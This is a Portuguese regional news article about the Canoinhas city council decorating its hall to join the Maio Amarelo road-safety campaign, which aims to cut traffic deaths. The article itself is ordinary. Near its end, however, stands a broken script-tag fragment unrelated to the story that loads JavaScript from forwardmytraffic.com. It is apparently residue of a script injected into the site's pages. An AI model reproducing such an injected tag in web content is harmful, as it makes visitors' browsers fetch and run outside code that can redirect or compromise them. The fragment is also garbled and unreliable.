InícioDestaqueCâmara de Vereadores de Canoinhas adere ao Movimento Maio Amarelo

Câmara de Vereadores de Canoinhas adere ao Movimento Maio Amarelo

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio estimado em R$ 3,5 milhões

As seis dezenas do concurso 2.716 da Mega-Sena serão...

Pedidos de isenção da taxa do Enem podem ser feitos até sexta-feira

Termina na próxima sexta-feira (26) o prazo para pedir...

Entenda o Programa Acredita, que pretende ampliar acesso ao crédito

Com o potencial de destravar até R$ 30 bilhões...

Com o tema “Nós somos o trânsito”, o Movimento Maio Amarelo, tem como meta nesse ano mobilizar todo país a fim de reduzir o número de mortes no trânsito. Com o objetivo de conscientizar a comunidade de Canoinhas, a Câmara de Vereadores também aderiu à campanha, ornamentando o  hall  de entrada e plenário, propondo chamar a atenção durante esse mês, sobre a importância da mudança de atitude no trânsito, lembrando que todos são responsáveis para mudar o cenário, adotando novos comportamentos no trânsito.

 

 

A meta da campanha deste ano é lembrar que o trânsito é feito de pessoas. “Campanhas tão importantes como essa, fazem um apelo para a redução no número de mortes no trânsito”, destaca o presidente da Câmara, Coronel Mário Renato Erzinger (PR). Segundo estatísticas atuais, uma pessoa morre a cada 12 minutos em acidentes de trânsito no Brasil.

 

 

Sobre a Campanha Nacional:

A ação deste ano foi desenvolvida pela Associação Nacional dos Fabricantes de Veículos Automotores – Anfavea – em parceria com o Observatório Nacional de Segurança Viária, e doada ao Movimento Maio Amarelo. Todas as peças publicitárias podem ser utilizadas por quem desejar disseminar as ações em redes sociais para um trânsito mais seguro.

 

 

Com o tema “Nós somos o trânsito”, a proposta chama a atenção sobre a importância da mudança de atitude nos deslocamentos, evidenciar que as mortes causadas por acidentes de trânsito precisam ser freadas e lembrar que cada um é responsável por mudar esse cenário adotando novos comportamentos. As peças publicitárias fazem um convite a todos os cidadãos: que cada um faça sua parte por um trânsito mais seguro.

 

 

Com a hastag #NósSomosoTrânsito”, o objetivo é que as pessoas possam firmar o compromisso com a redução do número de vítimas do trânsito fazendo a sua parte, que é respeitar as leis de trânsito. Para conhecer mais sobre a campanha, basta acessar o site www.maioamarelo.com ou do Observatório www.onsv.org.br

… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.